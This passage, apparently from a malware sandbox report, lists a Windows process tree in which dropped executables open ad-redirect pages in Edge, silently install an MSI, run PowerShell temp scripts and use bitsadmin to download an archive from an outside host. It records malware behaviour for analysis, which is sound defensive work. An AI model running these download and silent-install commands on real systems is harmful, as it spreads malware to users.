                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb4718
                                                                                                      11⤵
                                                                                                        PID:2412
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
                                                                                                        11⤵
                                                                                                          PID:5292
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
                                                                                                          11⤵
                                                                                                            PID:6188
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
                                                                                                            11⤵
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:1244
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
                                                                                                            11⤵
                                                                                                              PID:6024
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
                                                                                                              11⤵
                                                                                                                PID:6992
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
                                                                                                                11⤵
                                                                                                                  PID:1812
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
                                                                                                                  11⤵
                                                                                                                    PID:4504
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
                                                                                                                    11⤵
                                                                                                                      PID:2884
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5668 /prefetch:8
                                                                                                                      11⤵
                                                                                                                        PID:5300
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5668 /prefetch:8
                                                                                                                        11⤵
                                                                                                                          PID:4732
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5612 /prefetch:2
                                                                                                                          11⤵
                                                                                                                            PID:7028
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
                                                                                                                            11⤵
                                                                                                                              PID:668
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
                                                                                                                              11⤵
                                                                                                                                PID:6204
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4484 /prefetch:1
                                                                                                                                11⤵
                                                                                                                                  PID:6804
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
                                                                                                                                  11⤵
                                                                                                                                    PID:7020
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
                                                                                                                                    11⤵
                                                                                                                                      PID:1932
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
                                                                                                                                      11⤵
                                                                                                                                        PID:4384
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4560 /prefetch:1
                                                                                                                                        11⤵
                                                                                                                                          PID:2148
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
                                                                                                                                          11⤵
                                                                                                                                            PID:2652
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
                                                                                                                                            11⤵
                                                                                                                                              PID:2140
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
                                                                                                                                              11⤵
                                                                                                                                                PID:5664
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
                                                                                                                                                11⤵
                                                                                                                                                  PID:6932
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:1
                                                                                                                                                  11⤵
                                                                                                                                                    PID:6520
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1
                                                                                                                                                    11⤵
                                                                                                                                                      PID:4732
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                                    10⤵
                                                                                                                                                      PID:3656
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb4718
                                                                                                                                                        11⤵
                                                                                                                                                          PID:3944
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                                                                                                                                                        10⤵
                                                                                                                                                          PID:1940
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb4718
                                                                                                                                                            11⤵
                                                                                                                                                              PID:496
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
                                                                                                                                                            10⤵
                                                                                                                                                              PID:244
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb4718
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:5236
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                                                                                                10⤵
                                                                                                                                                                  PID:2088
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb4718
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:1864
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:1648
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb4718
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:4776
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
                                                                                                                                                                        10⤵
                                                                                                                                                                          PID:5984
                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb4718
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:5764
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\62-2b675-62a-be9aa-575251396fa54\Ridowyshuba.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\62-2b675-62a-be9aa-575251396fa54\Ridowyshuba.exe"
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:6632
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mp1ykvmv.yzq\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:3088
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\mp1ykvmv.yzq\installer.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\mp1ykvmv.yzq\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                  11⤵
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                  PID:2516
                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\mp1ykvmv.yzq\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\mp1ykvmv.yzq\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1636985251 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                    12⤵
                                                                                                                                                                                      PID:5568
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yf3vlioj.fi1\any.exe & exit
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:4148
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\yf3vlioj.fi1\any.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\yf3vlioj.fi1\any.exe
                                                                                                                                                                                      11⤵
                                                                                                                                                                                        PID:7116
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\yf3vlioj.fi1\any.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\yf3vlioj.fi1\any.exe" -u
                                                                                                                                                                                          12⤵
                                                                                                                                                                                            PID:920
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lcdvcjoi.swh\autosubplayer.exe /S & exit
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:7064
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lcdvcjoi.swh\autosubplayer.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\lcdvcjoi.swh\autosubplayer.exe /S
                                                                                                                                                                                            11⤵
                                                                                                                                                                                              PID:6588
                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"
                                                                                                                                                                                                12⤵
                                                                                                                                                                                                  PID:1164
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"
                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                    PID:5404
                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                        PID:4016
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"
                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                        PID:4532
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"
                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                          PID:5532
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"
                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                            PID:5916
                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                PID:3692
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"
                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                PID:3424
                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                  PID:6268
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"
                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                  PID:6936
                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                  "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                  • Download via BitsAdmin
                                                                                                                                                                                                                  PID:5052
                                                                                                                                                                                                          • C:\Program Files\Windows Defender\WHYXYUYJMT\foldershare.exe
                                                                                                                                                                                                            "C:\Program Files\Windows Defender\WHYXYUYJMT\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                              PID:4608
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Thu13f11af06b.exe
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                    PID:2128
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13f11af06b.exe
                                                                                                                                                                                                      Thu13f11af06b.exe
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      PID:2216
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13f11af06b.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13f11af06b.exe
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:4016
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Thu13a8cbc236137c.exe
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                    PID:4092
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13a8cbc236137c.exe
                                                                                                                                                                                                      Thu13a8cbc236137c.exe
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:4540
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
